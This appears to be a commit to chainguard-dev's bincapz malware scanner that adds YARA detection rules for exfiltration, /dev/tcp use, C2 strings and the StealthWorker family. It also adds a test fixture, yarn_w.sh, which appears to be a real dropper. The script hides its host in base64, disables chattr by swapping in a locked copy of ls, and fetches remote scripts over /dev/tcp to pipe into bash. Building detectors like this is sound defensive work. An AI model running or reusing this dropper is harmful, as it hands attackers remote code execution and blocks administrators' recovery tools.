Improve rules from Stealthworker inspection

chainguard-dev · Mar 7, 2024 · a32b7f2 · a32b7f2
1 parent 982b8ec
commit a32b7f2
Show file tree

Hide file tree

Showing 29 changed files with 226 additions and 6 deletions.
diff --git a/pkg/bincapz/render.go b/pkg/bincapz/render.go
@@ -90,8 +90,8 @@ func RenderTable(fr *FileReport, w io.Writer) {
 	if width > 110 {
 		valWidth += (width - 110)
 	}
-	if valWidth > 60 {
-		valWidth = 60
+	if valWidth > 65 {
+		valWidth = 65
 	}
 
 	klog.Infof("terminal width: %d / val width: %d", width, valWidth)

diff --git a/rules/archives/zip.yara b/rules/archives/zip.yara
@@ -5,6 +5,8 @@ rule zip : notable {
 	strings:
 		$ref = "ZIP64" fullword
 		$ref2 = "archive/zip"
+		$ref3 = "zip_writer" fullword
+		$ref4 = "ZIP archive" fullword
 	condition:
 		any of them
 }
diff --git a/rules/combo/exfil/osascript_http_zipper.yara b/rules/combo/exfil/osascript_http_zipper.yara
@@ -0,0 +1,13 @@
+
+rule osascript_http_zipper : suspicious {
+  meta:
+	description = "runs AppleScript, makes HTTP requests, zips files"
+  strings:
+	$ref = "osascript" fullword
+	$readdir = "readdir" fullword
+	$socket = "socket" fullword
+	$http = "HTTP" fullword
+	$zip = "zip_writer"
+  condition:
+	all of them
+}
diff --git a/rules/databases/mysql.yara b/rules/databases/mysql.yara
@@ -0,0 +1,9 @@
+
+rule mysql : notable {
+  meta:
+	description = "accesses MySQL databases"
+  strings:
+    $ref = "mysql" fullword
+  condition:
+	$ref
+}
diff --git a/rules/databases/postgresql.yara b/rules/databases/postgresql.yara
@@ -0,0 +1,10 @@
+
+rule postgresql : notable {
+  meta:
+	description = "accesses PostgreSQL databases"
+  strings:
+    $ref = "postgresql" fullword
+	$ref2 = "github.com/go-pg" fullword
+  condition:
+	any of them
+}
diff --git a/rules/databases/sqlite.yara b/rules/databases/sqlite.yara
@@ -0,0 +1,9 @@
+rule sqlite : notable {
+  meta:
+	description = "accesses SQLite databases"
+  strings:
+    $ref = "sqlite" fullword
+	$ref3 = "sqlite3" fullword
+  condition:
+	any of them
+}
diff --git a/rules/evasion/bash_tcp.yara b/rules/evasion/bash_tcp.yara
@@ -0,0 +1,9 @@
+
+rule bash_tcp : suspicious {
+	meta:
+		description = "sends data via /dev/tcp (bash)"
+	strings:
+		$ref = /[\w \-\<]{0,32}>"{0,1}\/dev\/tcp\/[\$\{\/\:\-\w\"]{0,32}/
+	condition:
+		$ref
+}
diff --git a/rules/evasion/content-length-0.yara b/rules/evasion/content-length-0.yara
@@ -0,0 +1,10 @@
+rule content_length_0 : suspicious {
+  meta:
+	description = "Sets HTTP content length to zero"
+  strings:
+	$ref = "Content-Length: 0"
+  condition:
+	$ref
+}
+
+
diff --git a/rules/evasion/process-check.yara b/rules/evasion/process-check.yara
@@ -3,7 +3,9 @@ rule activity_monitor_checker : suspicious {
     hash_2020_BirdMiner_tonsillith = "9f8dba1cea7c8a4d7701a6a3e2d826202ba7e00e30e9c836c734ad6842b8cb5e"
     hash_2020_BirdMiner_tormina = "4179cdef4de0eef44039e9d03d42b3aeca06df533be74fc65f5235b21c9f0fb1"
   strings:
-    $pgrep = /pgrep [\-\w]{0,4}"Activity Monitor"/
+	$ps = "ps" fullword
+	$pgrep = "pgrep" fullword
+	$am = "Activity Monitor" fullword
   condition:
-    any of them
+	$am and any of ($p*)
 }
diff --git a/rules/exfil/sysinfo_http.yara b/rules/exfil/sysinfo_http.yara
@@ -0,0 +1,10 @@
+
+rule sysinfo_http : suspicious {
+  meta:
+	description = "sends host information via HTTP GET variables"
+  strings:
+	$ref = "&hostname="
+	$ref2 = "&uname="
+  condition:
+	any of them
+}
diff --git a/rules/exfil/telegram.yara b/rules/exfil/telegram.yara
@@ -4,8 +4,10 @@ rule telegram_bot : suspicious {
     ref = "https://github.com/bartblaze/community/blob/3f3997f8c79c3605ae6d5324c8578cb12c452512/data/yara/binaries/indicator_suspicious.yar#L676"
   strings:
     $s1 = "api.telegram.org"
+    $s1_b64 = "api.telegram.org" base64
     $s3 = "Content-Disposition: form-data; name=\""
     $p1 = "/sendMessage"
+    $p1_b64 = "/sendMessage" base64
     $p2 = "/sendDocument"
     $p4 = "/sendLocation"
   condition:

diff --git a/rules/fs/file-open.yara b/rules/fs/file-open.yara
@@ -6,6 +6,7 @@ rule file_open : harmless {
 		$fopen = "fopen" fullword
 		$fopen64 = "fopen64" fullword
 		$fclose = "fclose" fullword
+		$file_open = "file open failed"
 	condition:
 		any of them
 }

diff --git a/rules/fs/file-sync.yara b/rules/fs/file-sync.yara
@@ -6,6 +6,7 @@ rule fsync : harmless {
 		syscall = "fsync"
 	strings:
 		$ref = "fsync" fullword
+		$ref2 = "syscall.Fsync" fullword
 	condition:
 		any of them
 }
diff --git a/rules/kernel/uname-get.yara b/rules/kernel/uname-get.yara
@@ -6,6 +6,7 @@ rule uname : notable {
 		syscall = "sysctl"
 	strings:
 		$uname = "uname" fullword
+		$uname2 = "syscall.Uname" fullword
 	condition:
 		any of them
 }

diff --git a/rules/malware/family/stealthworker.yara b/rules/malware/family/stealthworker.yara
@@ -0,0 +1,8 @@
+rule stealthworker : critical {
+	meta:
+		description = "StealthWorker Worm/Trojan"
+	strings:
+		$ref = "StealthWorker/Worker"
+	condition:
+		all of them
+}
diff --git a/rules/net/ftp.yara b/rules/net/ftp.yara
@@ -0,0 +1,9 @@
+rule ftp {
+	meta:
+		description = "File Transfer Protocol (FTP)"
+	strings:
+		$ref = "ftp.Dial" fullword
+		$ref2 = "EPSV" fullword
+	condition:
+		any of them
+}
diff --git a/rules/net/http-auth.yara b/rules/net/http-auth.yara
@@ -0,0 +1,10 @@
+rule http_auth {
+	meta:
+		description = "makes HTTP requests with basic authentication"
+	strings:
+		$ref = "Www-Authenticate"
+		$ref2 = "WWW-Authenticate"
+		$ref3 = "www-authenticate"
+	condition:
+		any of them
+}
diff --git a/rules/net/sendfile.yara b/rules/net/sendfile.yara
@@ -5,6 +5,7 @@ rule sendfile {
 		ref = "https://man7.org/linux/man-pages/man2/sendfile.2.html"
 	strings:
 		$ref = "sendfile" fullword
+		$ref2 = "syscall.Sendfile" fullword
 	condition:
 		any of them
 }

diff --git a/rules/net/url-request.yara b/rules/net/url-request.yara
@@ -1,8 +1,10 @@
 rule requests_urls : notable {
 	meta:
-		description = "Makes network requests using a URL"
+		description = "requests resources via URL"
 	strings:
 		$ref = "NSMutableURLRequest"
+		$ref2 = "import requests"
+		$ref3 = "net/url"
 	condition:
 		any of them
 }
diff --git a/rules/persistence/macos/launchd-manipulation.yara b/rules/persistence/macos/launchd-manipulation.yara
@@ -5,7 +5,8 @@ rule launchctl : notable {
 		platforms = "darwin"
 	strings:
 		$ref = "LaunchAgents" fullword
+		$ref2 = "launchctl"
 	condition:
-		any of them
+		all of them
 }
 
diff --git a/rules/process/detach_daemonize.yara b/rules/process/detach_daemonize.yara
@@ -0,0 +1,10 @@
+
+rule detach : suspicious {
+  meta:
+	description = "process detaches and daemonizes"
+  strings:
+	$ref = "xdaemon"
+	$ref2 = "go-daemon"
+  condition:
+	any of them
+}
diff --git a/rules/ref/site/download.yara b/rules/ref/site/download.yara
@@ -13,6 +13,7 @@ rule download_sites : suspicious {
     $d_rentry = "rentry.co"
     $d_penyacom = "penyacom"
     $d_controlc = "controlc.com"
+	$d_anotepad = "anotepad.com"
     $d_privnote = "privnote.com"
     $d_hushnote = "hushnote"
     $not_mozilla = "download.mozilla.org"

diff --git a/rules/ref/words/decryptor.yara b/rules/ref/words/decryptor.yara
@@ -0,0 +1,8 @@
+rule decryptor : notable {
+	meta:
+		description = "References 'decryptor'"
+	strings:
+		$ref = "decryptor"
+	condition:
+		any of them
+}
diff --git a/rules/ref/words/dropper.yara b/rules/ref/words/dropper.yara
@@ -0,0 +1,9 @@
+rule decryptor : notable {
+	meta:
+		description = "References 'dropper'"
+	strings:
+		$ref = "dropper" fullword
+		$ref2 = "Dropper" fullword
+	condition:
+		any of them
+}
diff --git a/rules/ref/words/locked-files.yara b/rules/ref/words/locked-files.yara
@@ -0,0 +1,9 @@
+rule lockedFiles : suspicious {
+	meta:
+		description = "References 'locked files'"
+	strings:
+		$ref = "lockedFiles"
+		$ref2 = "lockedFileNames"
+	condition:
+		any of them
+}
diff --git a/rules/ref/words/server_address.yara b/rules/ref/words/server_address.yara
@@ -0,0 +1,9 @@
+rule server_address : suspicious {
+	meta:
+		description = "references a 'server address', possible C2 client"
+	strings:
+		$underscores = /\w{0,32}server_addr\w{0,32}/
+		$mixed = /\w{0,32}serverAddr\w{0,32}/
+	condition:
+		any of them
+}
diff --git a/rules/secrets/htpasswd.yara b/rules/secrets/htpasswd.yara
@@ -0,0 +1,9 @@
+rule htpasswd : notable {
+	meta:
+		description = "Access .htpasswd files"
+	strings:
+		$ref = ".htpasswd"
+		$ref2 = "Htpasswd"
+	condition:
+		any of them
+}
diff --git a/rules/signal/send.yara b/rules/signal/send.yara
@@ -4,6 +4,7 @@ rule kill : harmless {
 		pledge = "proc"
 	strings:
 		$kill = "_kill" fullword
+		$go = "syscall.Kill" fullword
 	condition:
 		any of them
 }
diff --git a/testdata/Linux/yarn_w.sh b/testdata/Linux/yarn_w.sh
@@ -0,0 +1,54 @@
+#!/bin/bash
+#variables
+lspath=$(which ls)
+domain=$(echo Yi45LTktOC5jb20K|base64 -d)
+mainurl=$(echo aHR0cDovL2IuOS05LTguY29tL2JyeXNqCg==|base64 -d)
+#mv command
+
+if [ -x /bin/chattr ];then
+    mv /bin/chattr /bin/zzhcht
+elif [ -x /usr/bin/chattr ];then
+    mv /usr/bin/chattr /usr/bin/zzhcht
+elif [ -x /usr/bin/zzhcht ];then
+    export CHATTR=/usr/bin/zzhcht
+elif [ -x /bin/zzhcht ];then
+    export CHATTR=/bin/zzhcht
+else 
+   if [ $(command -v yum) ];then 
+	yum -y reinstall e2fsprogs
+	if [ -x /bin/chattr ];then
+           mv /bin/chattr /bin/zzhcht
+   elif [ -x /usr/bin/chattr ];then
+           mv /usr/bin/chattr /usr/bin/zzhcht
+	fi
+   else
+	apt-get -y reinstall e2fsprogs
+	if [ -x /bin/chattr ];then
+          mv /bin/chattr /bin/zzhcht
+  elif [ -x /usr/bin/chattr ];then
+          mv /usr/bin/chattr /usr/bin/zzhcht
+	fi
+   fi
+fi
+if [ -x /bin/zzhcht ];then
+    export CHATTR=/bin/zzhcht && cp $lspath /bin/chattr && /bin/zzhcht +ia /bin/chattr
+elif [ -x /usr/bin/zzhcht ];then
+    export CHATTR=/usr/bin/zzhcht && cp $lspath /usr/bin/chattr && /usr/bin/zzhcht +ia  /usr/bin/chattr
+else
+    export CHATTR=chattr
+fi
+
+
+vurl() {
+	IFS=/ read -r proto x host query <<<"$1"
+    exec 3<>"/dev/tcp/${host}/${PORT:-80}"
+    echo -en "GET /${query} HTTP/1.0\r\nHost: ${host}\r\n\r\n" >&3
+    (while read -r l; do echo >&2 "$l"; [[ $l == $'\r' ]] && break; done && cat ) <&3
+    exec 3>&-
+}
+
+if [ "$(id -u)" = "0" ];then 
+vurl  ${mainurl}/d/ar.sh |bash
+else
+vurl  ${mainurl}/d/ai.sh |bash
+fi